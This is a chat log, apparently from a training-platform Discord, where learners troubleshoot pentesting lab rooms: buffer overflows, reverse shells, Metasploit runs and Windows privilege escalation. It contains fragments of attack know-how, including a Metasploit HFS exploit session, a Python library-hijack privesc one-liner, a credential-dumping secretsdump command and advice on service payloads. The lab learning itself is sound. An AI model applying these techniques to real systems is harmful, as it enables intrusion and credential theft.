Hello All , I have a question that is bugging my mind. on the offensive pentesting path, stack-based buffer overflows, I have this gimmick I could not see why I am encountering. I need to find the badchars. But in all the trials, although \x00 is omitted, I keep getting \x01\x02 etc.. When I add them to the badchars in mona and remove from the exploit itself, I still get the piece of the sequence.

If I remove \x00\x01 etc, badchars start from the next byte, \x02 in this example

I am a bit confused , any help to make me understand will be greatly appreciated!

x00 is a null byte, that usually terminates strings. It's almost always a bad char.

yes so I need to omit it from the payload and the mona , which I do, but I keep getting the adjoining bytes,

I can't work out what you're saying.
You're meant to get the bytes in order, what is the problem?

the problem is, each time I rerun the exploit after omitting, it never reaches to undefined

there is always initial bytes remaining

But since I remove the null byte

should not they just disappear automatically?

for example, check my log :

Bad chars 1:

00 01 02 03 04 05 3e 3f e1 e2

Bad Chars 2:

00 01 02 03 04 05 3e 3f e1 e2

Bad Chars 3:

00 01 02 03 04 05 06 3e 3f e1 e2

Bad Chars 4:

00 01 02 03 04 05 06 07 3e 3f e1 e2

https://www.omegavo.id/binexp-corner-1-bofs.html#binexp-corner-1-bofs send all the badchars at once

you see the inital sequence ? each time they go +1, although in mona bytearray.bin and in payload they are removed

argh, I see, not one by one. maybe this is the problem. will do again and let you know! thanks @keen iris

Gave +1 Rep to @keen iris

Hii guys.I am solving dailybugle.I have initial shell as apache.Can any give me any hint regarding horizontal priv esc?

are you still working on this?

yup I took a break.But will start now.Any hinti are appreciated!

room: brainstorm, task 2: how many ports are open? nmap scans say ||3 open ports|| but the answer is wrong...

the answer is ||6||? how?!

which stage are you stuck on? i can give you some ideas

Hi all. In the buffer overflow prep room, for overflow2 , my offset is coming ||633|| but seems the answer is ||634||. Is the problem same with everyone, or is it just me?

@carmine locust you might not have copy pasted the entire cyclic pattern payload by accident

@carmine locust try doing that part again, and make sure to change the prefix of both fuzzer.py and exploit.py to overflow2

Yeah, I have been changing everything and then trying it but still it doesn't work

Can I dm you btw?

yeah go ahead

i'm at work so may take a while to respond

I have got a question regarding the BOF room, Task 6, OVERFLOW5. I did a lot of similar bofs already for oscp prep, they usually take me about 20-30 minutes. But this one just does not seem to work.

• Since I'm able to check if I found the correct offset and badchars, I know it must be something else.
• I know the msfvenom payload works, and the outgoing port 443 is not blocked because the payload worked for OVERFLOW4. (ip and port is correct)
• I see that the thread is created for my payload to execute
• I tried a lot of different paddings (also no padding)
• I even checked with a writeup and I did everything the same, even picked the same "jmp esp" address.

Is there anything left for me to check? Any hints what I might be missing?

Edit: Found the issue, I had a f***in typo in the msfvenom command in one of the badchars...like \xfD instead of \xfd. Apparently this is case-sensitive and I'm an idiot -.-

think my first one i had everything 'correct' except the slashes the wrong way in the retn

for room: brainstorm, in which environment are we expected to do the BOF? there isn't a windows environment provided in the lab, yeah?

do we have to set up our own vm or what?

Correct

IIRC you want to match the target machine as close as possible

is there a specific way to do that? like it's not just creating a windows vm right

It's just creating a windows VM

okay

is it possible to just install immunity debugger on my kali machine using wine? or is that not recommended?

i mean, i know it's possible. just wondering if that's the norm or is it typical to run it on some other VM

Considering the environment would be different from an actual windows machine, no. People don't tend to do that.

Don't I need a product key to set up windows on a VM? Where do I get a viable product key?

Nope you don't need. A typical windows 10 VM comes with a 30 days validity.

I just tried a Windows 10 iso from Microsoft using Virtualbox on the Kali Attackbox and it froze. I can't figure this out.

https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/

Get the VM from this link and try for VM ware

Thanx, I'll try it. I've been trying the Brainstorm room for over a week and can't get past this part.

I know there is a 20GB download though but it worked for me so..

No problem. Take a short break and then try, you'll be able to work it out soon. 🙂

Hey guys. Quick question. Can a 32-bit privsec exploit (.exe, .ps1) work on a 64-bit system?

Potentially. It'll depend on the privesc

Thanks @keen iris for the quick reply 🙂. Can you please explain it a little further maybe with an example?

Gave +1 Rep to @keen iris

The code will run

But it could be a bof etc and offsets etc might be different between 32 and 64bit

Alright @keen iris, I kinda got the idea. Thanks for helping me out 👍

I gotta say I really enjoyed the sky net challenge

Oh yea. It was a fun one

Hi people,
I started the tryhackme but got told it can actually open up my Device to real hackers to hack into my machine,
Is there any truth in this does anyone know? Thanks in advance for any answers

This is a common warning on most platforms like this.

not just Tryhackme

you are connecting to a network with vuln machines, other people may also be connect too, so in theory you device maybe exposed.

depending on the vpn setup also

using virtual machines to connect, ensuring firewalls is up and no unneeded service running will reduce this.

of course using the Web based Attack boxes would remove this risk.

you are just in your browser only

@drifting imp

decided to spent today doin a write up for it since i havent done one before. Figured i should probably start building out a github with all my write ups

Start a blog.

I started a little while ago

Started a git. Thinking of using medium or that aswell

I made a WordPress site

Don't use medium. Hacking content is against their tos and they've deleted entire accounts for posting writeups

God damn

Yep

the active directory rooms are really educational

learned so much already

anyone know what this error is all about? Get-DomainComputer : The term 'Get-DomainComputer' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

i'm running powerview.ps1 inside a windows shell, i'm fairly certain get-domaincomputer is the correct cmdlet

i'm trying to run the command Get-DomainComputer | select operatingsystem

Did you import the PowerView module?

yes

i’m going to run it again, sometimes in between rooms things get screwed up

same error

i run . .\PowerView.ps1 and then Get-DomainComputer

trying Get-DomainComputer | select OperatingSystem. same error :/

anyone know what gives? just for reference, i'm the room "post-exploitation basics", task 2

alright, i figured it out. i ended up using ||Get-NetComputer -fulldata|| instead of Get-DomainComputer

I know PowerView can be a little annoying, especially when Bloodhound gives you abuse info with cmdlets that aren't in PowerView anymore, but good on you for figuring it out!

yeah. AD section completed! now doing the extra credit rooms. wish this powershell room came earlier lol

Hi.
I have an odd problem with brainstorm.
So I tested my exploit locally and everything works perfectly but after changing the IP to the TryHackMe machine, the shell never comes back.
I've checked if I am connected to the VPN, I've checked if I entered the correct IP address in the msfvenom shell creation but still doesn't work

Currently doing the Buffer Overflow prep room. On task 2 and placed my "pattern_create.rb". But it ran once with a "Sending Evil" but now its saying not connected.

Did you restart the executable? In my experience, it’s probably best to close immunity debugger and set it up again every time you crash the application.

I think there’s also some kind of replay function in immunity, but I’ve never used it

hi, can i get a help with the internal room?

i am not able to access the wordpress login page

i could do a wpscan and bruteforce it but i cant use the creds to login

i saw in the forum that same issue happened for some guys but still not answered

you might have to edit /etc/hosts and add internal.thm to the list of hostnames, with the machine IP

@shell radish and access it here: http://internal.thm/blog/wp-admin.php

in the powershell hacking room, when trying to find the number of installed cmdlets, i tried 2 commands: 1. Get-Module -ListAvailable | Import-Module ; gcm -co cmdlet | measure and 2. Get-Command | Where-Object -Property CommandType -eq cmdlet | measure. both times i get the count: 6641, which is not the right answer. anyone know what i'm doing wrong?

@keen iris a third time

thank you so much, it worked

Gave +1 Rep to @edgy crypt

What paths should I complete first before doing the penetration testing path?

Particularly offensive security path

Depends on your current skill level

Hello, Where can I get help for the specific room or topic?

Well if it's about a room you might ask your question in #room-help

In the gatekeeper room , the script firefox_decrypt just doesn't work. I tried my best, but can't get it to work. Any ideas?

Tx mate this helped me also

hey all, currently doing gatekeeper. have gone through everything for the BO but i cannot for the life of me get a connection. Would appreciate some help

I keep on getting this error on Alfred when I type in python3 -m http.server:

Traceback (most recent call last):
File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"main", mod_spec)
File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.6/http/server.py", line 1211, in <module>
test(HandlerClass=handler_class, port=args.port, bind=args.bind)
File "/usr/lib/python3.6/http/server.py", line 1185, in test
with ServerClass(server_address, HandlerClass) as httpd:
File "/usr/lib/python3.6/socketserver.py", line 456, in init
self.server_bind()
File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use

Can anyone have help out ? Very new to this so apologies

That means the default port for the http.server is already in use, try a different one, like python3 -m http.server 8080

I think I found a typo on the GameZone room. Is this the correct place to post details?

#room-bugs

@dense gate is there a way I can take it out of use ?

I can’t get the listener to work

Not sure what you talking about?

sudo python3 -m http.server 80 kept on giving me an already in use error response

You advised me to use 8080 port instead

I’m basically trying to complete task 1 on Alfred to get the answer to question 3

Well port 80 might be also in use already. So why don't you simply use port 8080 as I assume this one is not in use?

Thank you I’ve just managed to finish the room

congratz!

btw, doing the "buffer overflow prep", does anyone that have done OSCP this year, are these examples still simillar? Is there any limitation on using pwntools on the exam?

Who else is on hack the box

literaly everyone in here xD

can anyone suggest what is the average time to root a box in this path ? it just seems that some boxes are taking a long time to root ..

It depends on your level & depth of knowledge but whatever it takes don't rush boxes, if you need time just take it slowly and learn at your own rhythm

How to find the iP to attack in active directory room?

It is, as always, the IP of the target that's displayed under Active Machine Information

I’m using web browser attack box and I can’t find the target ip anywhere

@keen iris can you help here plz

It sounds like you're unfamiliar with how to use the platform

Deploy the target machine.

On the top it shows the ip of attack box

https://tryhackme.com/room/tutorial

Thanks a lot ♥️♥️ @dense gate and @keen iris

Gave +1 Rep to @dense gate

hey guys, is anybody here for a question?

first time and I am having a problem about having too many machines open, I believe. I signed up for the attackbox, when I click start attackbox, I wait for it to open, and then I try to click start machine (to deploy the machine with the ip address and such) and I am obviously confusing something

it says I cant have more than x machines open

I am trying to run vulnersity, I apoligize for my ignorance, excited, but also know I dont know what I am doing.

in terms of this layout

When you finish rooms, do you make sure to hit the "terminate machine" button?

https://tenor.com/view/csgo-banging-table-angry-mad-rage-quit-gif-17478101

MFW I have to setup another reverse shell script

it's not necessary to, but i do it to save others' resources lol

Hello

Anyone from Nigeria

Finally completed this path, alot to learn in here

hey all, on brainpan 1. i have gone through and gotten most of the buffer overflow done. based on my research my values for the various stages of the exploit script are correct, however i cannot get a connection back when sending. would appreciate any nudging if anyone has time

Can anyone help with HackPark. Uploaded the exploit and then traversed to ?theme=../../App_Data/files. It gives me an OOPS error instead of the shell. Checked config, VPN and rebooted to 5 different boxes.

Did you update the exploit with correct ip and port?

hello, anyone has completed brainstorm?

i got into a very wierd scenario:

• i could exploit locally on a vm the chatserver.exe by overflowing the name.. all normal, jumped to a shell from msfvenom but, remotely simply crashed the server

• only when I changed my sploit to overflow the message I could indeed spawn a shell

is this a normal scenario when fuzzying? any ideas why it would work on my local windows vm but no remotely?

thanks 😄

i guess it is because of the exposed vuln (quite massive in windows boxes).. also the writeups available cut thru a shortcut but checking the iis conf gets the hint that writeups miss (that probably copied from one to another)

are you overflowing the message or the username? got the same issue and only the message got me the shell (for some reason I don't understand)

You can't overflow whatever you want. Before doing a buffer overflow, we have to identify the specific part of the program that's vulnerable (spiking). If you have the source code, this shouldn't be that bad, but if you don't, overflow each part of the program and see what happens.

Buffer overflow attacks are the result of not controlling how big a user's input can be. Sometimes this is controlled, and thus there is no overflow attack, or it isn't.

I've done it 3 weeks ago :))))

thx for replying tho

yeah, thing is the binary was exploitable on both my windows 7 machine vm (where I was able to run the buffer overflow over the username input, as well as the message)

(also spawning a shell as well)

somehow on the remote machine this did not verify (only the message field was spawning me a shell)

i think I settled with maybe the OS being different, or even the actual binary the ___ server was providing in comparison to the service running -.-'

I'm no binary exploitation expert, so I don't know the exact reason. I can tell you that the user name field was not vulnerable to overflow

On the remote machine

yes that is correct

and the root of my surprise...

i was overwritting the EIP with some jmp esp on that static linked binary, into some msfvenom payload with success (on the downloaded binary)

then remotely it just crashed the service xD

i'm also no expert.. but this kind of even demotivated me the most as I was very happy to first see the exploit running against my vm, to fail miserably on the remote machine xD

thx for the reply though

I feel that. When I first learned buffer overflows, for some reason, the offset I was getting from the debugger was one off from what it was in practice, so it definitely can be finnicky at times

The memory addresses can changes between devices. Which is why you use a NOP sled to hit your payload. You just need to jump to an address somewhere on that sled rather than needing the exact address

The address will be in the same general area on different devices, but there's no garuntee they'll be exactly the same.

so, when using something like a gadget we should prepend the payload with a bunch of NOPs to be sure we hit it from the beginning?

will give it a try

thank you 🙂

Yea. In general, your payload should be pretended by a bunch of NOPs. Then instead of aiming for 1 specific address your aiming to hit somewhere within a church of address

Yes. Updated IP to mine through my tun0 connection and the port settings also.

Congrats!

skynet had me pulling my hair

also I've noticed my terminals go away after like 2 hours ....

In the attacktive directory room, is anyone facing a problem with secretsdump.py file for Impacket?

If you're still looking for help,

1. What impacket version are you on?
2. What's your syntax

Hey hey guys wassupp! i am doing steelmountain and while i try to get the initial foothold with metasploit i get the message : This exploit may require manual cleanup of '%TEMP%\zYdDIPrYTNXE.vbs' on the target ......... then exploit completed but no session was created. Rebooted the room, my vpn and the machine as well but nothing changed. Anyone saw this b4? Thanks !

That message is a warning, not an issue

Check your options.

damn! i am missing something! yesterday was working today same settings dont! aarggg but thanks for the reply 🙂

Gave +1 Rep to @keen iris

Impacket 0.9.19 and the syntax is ||impacket-secretsdump -just-dc backup:backup2517860@10.10.75.218||

I've never seen impacket-secretsdump be the the actual command but if that's how you installed it then sure. Try removing the password from the syntax and putting it in manually.

impacket is definitely one of the more finnicky sets of tools

oooooooo wait

You need the domain in the syntax:
||impacket-secretsdump -just-dc spookysec.local/backup:backup2517860@10.10.75.218||

I tried this too. Still it's showing an error.

That’s not a typical error hmmmm

Try this and use ‘!’ to nuke your impacket install and reinstall https://github.com/Dewalt-arch/pimpmykali

I'll be installing this for the first time lol. Let's see. And what do you mean by using '!' ?

Oh okay I got it now after running it

So it works now?

Yes. It's working now. Thanks a lot man! 😄

Gave +1 Rep to @harsh ocean

I guess this fixed the whole python installation in my kali. I was also facing a python related problem on the Gatekeeper room. Will try out that too after I'm done with this room.

Hey everyone, I'm doing Steel Montain, I got the first root flag but, I wanted to upgrade my poorly basic reverse shell to something more usable. So I tried to use multi/handler with meterpreter payload, but the thing is my meterpreter shell is dying within 10 sec so i don't have time to migrate it to something like lsass or else. Do you have any hints how I can upgrade my shell ?

Is this the service binary?
Do you see status 1053 where you started the service?

You're speaking about the vulnerable service ?

I already managed to exploit it and restart it if this is you are wondering, and it gave me a reverse shell (root) on my listening nc, the thing is I want to improve this shell now (not asked in the box tho)

Generate your meterpreter with -f exe-service rather than -f exe

#offensive-pentesting-path message

Here's why

@dawn pollen

Oh okay thank you !

Hi, Can anybody help me with Steel Mountain? Im stuck with the Powershell part

What command are you trying and what is the output?

didn't say anything

🙂 fixed it

Thanks for your reply!

Just want to say starting out try hack me and pen test, what’s good

Hey there! for some reasons i cant get no rev shells on my kali. Win FW is off. This happened in Steelmountain and HackPark. Tried tethering and my place wifi. Same story. Ideas?

Make sure you're using your tun0 IP.

Yes man it s my tun0. Thanks

Gave +1 Rep to @keen iris

You solved it?

after rebooting everything disabling everything changing server YES it WORKED ! i dnt know how and why but it did work! 🙂

Maybe you had openvpn started 2 or more times and therefore more then just a tun0 interface, so any extra like tun1, tun2 etc. But who knows, at least it works now.

Is it possible to find on which port the application is running from immunity debugger?

Hey... Any nudge on getting PowerUp.ps1 running on Windows (Steel Mountain Room / Privesc part). My head is melting.
When I am loading PowerUp.ps1 module with . .\PowerUp.ps1 or alternatively I tried with powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}" from cmd, but it just keeps returning errors about invalid tokens like:

At C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\PowerUp.ps1:2292 char:36
+                 $ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd 
/ad ...
+                                    ~~~
Unexpected token 'net' in expression or statement.
At C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\PowerUp.ps1:2296 char:80
+                 $ServiceCommand = "net user $UserNameToAdd $PasswordToAdd 
/add & ...
+                                                                              
  ~
The token '&&' is not a valid statement separator in this version.
At C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\PowerUp.ps1:2296 char:96
+ ... & timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add"
+                    ~~

Anyone had something similar ?

Problem in Game Zone :
In Task 5 Exposing services with reverse SSH tunnels -
ssh -L 10000:localhost:10000 <username>@<ip> didn't work
but ssh -L 10000:127.0.0.1:10000 <username>@<ip> worked. WHY??
Also in metasploit why we have to set ssl false

If your machine doesn't have the localhost entry in your /etc/hosts file, you cannot refer to 127.0.0.1 as "localhost"

It's just an alias. 127.0.0.1 is the loopback address that allows you to refer to your own machine, to give the simple explanation.

Hey guys, I'm working on the brainstorm room and I'm having trouble running chatserver.exe on any of my virtual windows systems. I've tried windows 7 32-bit and windows 10 32-bit. Also, when I load chatserver.exe in Immunity Debugger and try to run it, the program crashes.

Download it in binary mode from FTP (or I might be thinking of a different room)

I looked at the older messages... I didn't dl in binary mode

Thanks!

I have localhost set to 127.0.0.1 in /etc/hosts but still facing the same problem

https://serverfault.com/questions/785827/cannot-use-localhost-but-127-0-0-1-works

BrainStorm- chatserver.exe is not opening on my windows lab for testing.

My windows is win7 x64. Do i really need to create a32bit windows env to test this one

Did you download it in binary mode?

i used mget *

If you don't know if you downloaded it in binary mode, you didn't.

Download it in binary mode.

it worked

why didn't it worked before

Read up about what you did differently

Brainstorm : I got shell from chatserver.exe from my testing windows lab but I am not getting shell from target using the code.

I have changed the target IP and msfvenom generated payload for listener acc to tryhackme'vpn IP in my python script.

My code that didn't work when trying todo on thm Brainstorm -

My code that did work when trying todo on my lab -

Anyone who completed Brainstorm recently?

What OS have you used for chatserver.exe? I tried with win 7 64b and win xp sp1 none of them worked

to run the app

Nvm, figured it out, it was working on 32b and i used WIN 7 ultimate edition 32b

@stuck stag can i dm u regarding Brainstorm

sure

`gobuster dir -u http://10.10.129.202 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 1 ⨯

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.10.129.202
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/11/19 13:43:40 Starting gobuster in directory enumeration mode

Error: error on running gobuster: unable to connect to http://10.10.129.202/: Get "http://10.10.129.202/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)`

I am getting error while running gobuster can someone help me?

you sure thats hte correct ip?

yes

who can check for me in internal room wp-login page?

Checking what?

can u login or not

If you sent me in a DM the url of your target machine and the creds I can do it for you

ok tx

hello Ive encountered problem in Dailybugle room, I already created revshell but stuck on my way switching to other user. Any non spoiler hint?

welp nevermind guys, somehow I copied extra space to the password -,-

Wow I just finished the SKYNET box without looking at a walk-through. Feels awesome

Why do we need set-execution policy?? I know what it does by defn. But what are the **commands that won't work **without setting it to unrestrited?

Anything

The execution policy defines what you can do with powershell on the system

I think be default it's remote signed

Which means that from a reverse shell, you won't be able to execute any powershell at all cuz your commands won't be signed correctly

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.2

No...

PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.```

Is there a bug with HackPark on this path? I've completed all of the rooms in this path yet I'm still at 80% progress because of HackPark, even though I completed the room

why cant it find the file ?

It seems the file has the ending .txt.txt and not only .txt

lol, thanks

Gave +1 Rep to @dense gate

Hi

hello guys, may someone kindly please help me in the subdomainenumeration task 6, i have failed to answer the question close to one and a half weeks

Hi all, I am looking for advice on Home Lab on PC. Please DM me. Thanks.

Hello 🙂 I have issues with the Brainstorm room (from the offensive pentest path). I cannot connect properly to my windows vm and this room already cost me a lot of days ... Can someone help me, please? Probably I do something wrong when configuring the windows vm, or maybe trying to connect wrong network, or I just do not have direct access from one of the vms to the other..

Make sure that both of your VMs are on the same network settings. Ideally, you set both of them to NAT.

like this

NAT Network in Vbox otherwise they are isolated from each other

VBox NAT gives the VMs 10.0.2.15 and isolates them from each other by default.

whoops yeah

mixed them up

Good evening everyone. I have a question about Brainpan 1 room. I was able to do the buffer overflow but I'm confused when I get access to the machine I thought it was windows machine but it looks the machine is Linux and the Linux commands don't work
Anny suggestion? And also If there is someone who can explain me what's going on 😄

There's something that lets you run Windows programs on Linux

Yeah, I have just try to generate new shell code for Linux. Thanks 🙂

Gave +1 Rep to @keen iris

I don't know if that will work but I'd read up about wine

Pretty sure using Linux shell code worked when I did that room iirc

Just for PoC. I know about Wine, I just didn't expect that the machine will be Linux and the thing which confused me more was that I used shell code for Windows but I spotted Linux directories and Linux commands didn't work 😵‍💫 . However I got root access and I was able to complete the challenge 🥳

why does this lead to PE
||echo "import subprocess;subprocess.call('/bin/sh');" > random.py sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

with sudoers:
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py||

i get that I can run the walrus python script as rabbit user but how does the random.py create a subprocess in the walrus script when ran?

User is allowed to run it as sudo — with root privileges

Rabbit calls a python script while running as root

While running as root the python script calls bash

I haven’t done that one so can’t really speak to it further but that’s the jist

oh I think I figured it out with your help ... I'm going to have to do more research on python and how it calls libraries

thank you

You’re welcome

This is less a python thing and more how user and group permissions function

it is indeed related to the way that python searches for imports using the sys.path and PYTHONPATH variables, and how it automatically executes any code included in an imported module. the docs are also pretty good for more info on this : https://docs.python.org/3/tutorial/modules.html#the-module-search-path

As far as I know you can add a write up to the room itself. If it's getting approved it will be listed on the write up section in that room

i meant share a write-up that i'd written in a comment, i don't know if that's considered self-promotion. i didn't submit it to the room because there are dozens already.

Oh okay, well you are not supposed to share write ups that are not approved I think. Got that told once when I shared one with someone who had an issue on a room.

changed, thanks for the tip

Gave +1 Rep to @dense gate

Hello 🙂 I need a hint for the GateKeeper room. I downloaded the .exe, but when running it on the windows machine I receive this error: "The code execution cannot proceed because VCRUNTIME140.dll was not found. Reinstalling the program may fix this problem."

I am using windows 10, 64bit, and the chatserver.exe was working fine on this machine

I found that it might be a problem with the VS version of the Redistributable, and I followed one guide - uninstall it and install the 2015 and then 2017. However, the 2015-2022 versions are with the same installer, so, it doesn't matter. However, this didn't work

Also, I saw that I have this dll in the C:\Windows\System32

Is it?
It's about hijacking a library.

Hey guys

having some trouble in Brainstorm

In my environment, I can create a reverse shell

but when I attack thm box, the reverse shell does not happens

tried to change ports, encoding, arch

nothing seems to work

ant advices?

Just got it... no worries about my questioning above

Guys, someone knows what happens when we send shellcode? From the python script, I tried different encodings and all of them seems to work, but the same shellcode from netcat is interpreted literally. I'm on gatekeeper...

A common thing to do, especially for a sysadmin, is to execute shell commands. But what usually will end up in a bash or batch file, can be also done in Python.

I had this problem too and downloading the 32 bit version of the Redistributable worked for me.

Oh, good.. but did you downloaded this version on a 64bit windows or you also used 32bit win ?

I have 64 bit windows. I think maybe because the program is 32 bit.

Great, thanks! I will try it out 🙂

Gave +1 Rep to @dusk nexus

Hey guys im trying to solve kenobi machine and while reading the website it says to search for proftpd 1.3.5 exploit but then after searching the writing goes on without using any of the exploit i want to know why

And what will happen if used the exploit will it give me the same result

It worked, man. Thank you, again!

Gave +1 Rep to @dusk nexus

Glad to hear! Good to see my frustrations with the room helped someone else.

Yeah, really helped to me.. Last time I lost a lot of days for the Brainstorm room and the reason was only the network configuration of the machines, another person from the group gave me this hint 😄

can anyone help to become a hacker bc I ma noob I mean I just know python

thats a very vague question

First thing to realise is that hacking and programming are only very loosely interlinked.
Secondly, check out #start-here

I mean if I want to use some python library in hacking I would be know that

For the Retro room. Is there another way to get IE to pop up? Running Chrome and IE before running the .exe doesn't seem to work anymore.

Nvm.

pls as to retro machine i get reverse shell and tried to connect with meterpreter then i try to run "shell" command it gets disconnect ( i was trying to run systeminfo to use on exploit suggester) , so i tried to connect with xfreerdp and got user.txt then i run sysinfo but iam not allowed to copy from xfreerdp to kali so any hints on what to do ??

can you not run sysinfo from meterpreter?

Can anyone spare a few moments to help me understand something in the BufferOverflowPrep task 2?

I'm trying to answer the last question here. I successfully got the reverse shell, but I'm confused on why the answer I'm providing for the bad chars is incorrect for the question, yet it led me to a successful reverse shell.

Nevermind. Went back through the module and figured it out.

the result will be less than systeminfo from the cmd (to use in windows exploit suggester python script)

ok

so what do you mean when you run shell it disconnects? is there any error message?

meterpreter > shell
Process 3280 created.
Channel 0 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro>systeminfo

Terminate channel 0? [y/N]

I completed the path , can anyone suggest me what to do next ?

Anyone have any recommendations for Immunity Debugger / mona plugin equivalents for my Kali box as Immunity Debugger is windows only.

When you do exploit development, you want your target/test machine to be as close to the real environment as possible

There is no good substitute as far as I know, you’ll have to spin up a Windows machine to make exploits for Windows

i see.

Man, finally finished Internal, it was really fkin hard

is any one else having problems with the attack box im using it for the time being

Anyone who solved gatekeeper recently? I dont get a shell back from msfconsole but i get a shell back the classic way

anyone tried Brainstorm recently (buffer overflow ctf)?. I can get my payload working with a test environment locally but when i try to run it on the target machine it just doesnt work, it just crashes and i need to start the machine all over again to just try again.

@balmy delta You're not the only one. I've been having the same issues.

So brainstorm, gatekeeper, malware re, brainpan, etc.

I'm starting to try to learn reverse engineering. What rooms should I start with? its the one sub-field/ thing on THM that just isn't clicking for me. Any recommendations? or good online res?

i actually was able to make it work after some trying. I dont know about the others rooms since i didn't started them, but with Brainstorm you need to fuzz the correct field when trying to run your payload on the target machine. For some reason, when you run the vulnerable app locally you can exploit it in the same fashion as the ones in the Buffer Overflow Prep room (https://tryhackme.com/room/bufferoverflowprep), but remotely this way will not work, you need to tweak the script a bit (i'll let you figure out how :P). I think this is a bug, but i can't exactly point exactly what could be difference (maybe they use a slighly different binary in the target machine)

anyone have problems with the room Relevant? soon as i run gobuster even with a timeout etc. it goes for awhile 30 minutes or so? Then i get exceeded error. and i cant run gobuster after that. I also cant terminate the room and restart it? what gives?

finished all the task on hackpark but only shows 76% complete for the room, is there a bug in this room?

@pastel matrix relevant is a sensitive one. I had the same issue in the same spot. It takes awhile and took a bunch of tries. You might have to increase your timeout up to 50-75.....depending on your network you might have to experiment a little bit. Try other tools like dirsearch.py, DirBuster, fuff, etc. I recommend dirsearch.

@crimson bay If you are 100% certain that you didn't miss any buttons - you should post it on the forum and get in contact with an admin.

Maybe reset the room and submit your answers again?

Ok I have a question, Am I just COMPLETELY out of practice or are the "guides" for Vulnversity, extremely Vague?

I will not say it's particularly vague but Yeah it kinda assumes you already have basic understanding of stuff and rooted a couple of boxes maybe.

I was just discussing this over in the room-help section.. If this is still a LEARNING Path, the flow is out of order. it asks you to upload a file and try to find something that works, then it asks to setup burpsuite, then create a wordlist, then go back to burpsuite and intercept, then try to get intruder to work without setting up any payload which doesnt work..
then finally upload the payload so it will actually work...

The flow is off, If it was rewritten along these lines its much easier for a "refresher/Learning" path..

And I dont mean step by Step, but enough Logical flow points..

1. you found the site, lets setup burpsuite and intercept an upload.
2. lets look at that intercept
3. lets create a wordlist
4. lets send that intercept into Intruder
5. Lets find a payload we can use with PHP sites.
   6.lets upload the payload..

Well the intruder part was for checking which extensions are blocked and if there is any we can use.

The flow may seem off to you maybe because they setup the word list in terminal
So you maybe like why open burp first

The flow is good in terms of having a good knowledge about target and having enumerated it before even trying to exploit.

Is there a room in THM that teaches us each phase in real-world pentest and how to generate reports?

After training pentest for a while, I seriously need some professional way to sharpen everything I learned

Hip Flask covers a lot of this

Would actually highly recommend it

You can also complete Wreath with the pentest report, that also has content on report writing

👍 Thanks sir! Finally I found what I need!

Gave +1 Rep to @sour moth

thanks at @thorny swan i will get that a shot.

is there a better alternative to nmap?

Better is very much subjective

not slow

Rustscan is very fast

But it might miss ports, or even take down the target if it's weak

hmm..ill check it out i know of ncat and uni but rust seems to be the most popular option

ncat is not a port scanner? It's netcat?

netcat

Yeah.

That ain't a port scanner, but you can use it in scripts to function as one

It won't be fast though

https://linuxhint.com/port-scan-netcat/

then its a portscanner

It's not a portscanner, it can be used to make one with scripting

it's also going to depend what "edition" of netcat, most likely

There's at least 3

@keen iris Hello sir

@keen iris Can you accept my friend rq? I'm planning to take OSCP next year and have some question about this cert

I'm not a mod, but you should read the thm discord rules, especially rule 1 about sending friend requests etc. 🙂 Just a suggestion.

Whats good cats , just popping by and saying hi

Seems to be an issue with the way Vulnersity is being generated, I'm using the suggested rev shell and the server seems to crash frequently, have been through multiple restarts

@warm hinge what’s good

I am doing Steel Mountain now and I need some guidelines

I have connected VPN and I have launch Metasploit

msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.64.0
rhosts => 10.10.64.0
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost tun0
lhost => tun0
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[] Started reverse TCP handler on 10.9.3.76:4444
[] Using URL: http://0.0.0.0:8080/0dIXeJp
[] Local IP: http://10.10.10.128:8080/0dIXeJp
[] Server started.
[] Sending a malicious request to /
[] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\SNxqooLKcJ.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) >

Can any one help me where I am not doing something right?

sometimes if you set lhost to tun0 it may mess up, just use the listener ip address it's self and see if that helps

Thanks @fleet wedge but I have tried that option earlier and didn't work

Gave +1 Rep to @torn reef

i love doing the steel mountain exploit and i have no issues, don't know what the issue is for you i may look into it

did you check sessions?

but I got a meterpreter when I used the Web-Based Kali machine. My challenge with the web-based kali machine is very slow

oof

kali makes it easier

at least I got the user.txt flag

true

that is where I having difficulties

dang, you cant get nothing to work XD

wow!

I am facing the problem in two rooms There is a question that I am sure of the answer to, but when I answer it it says "uh -oh undefined"

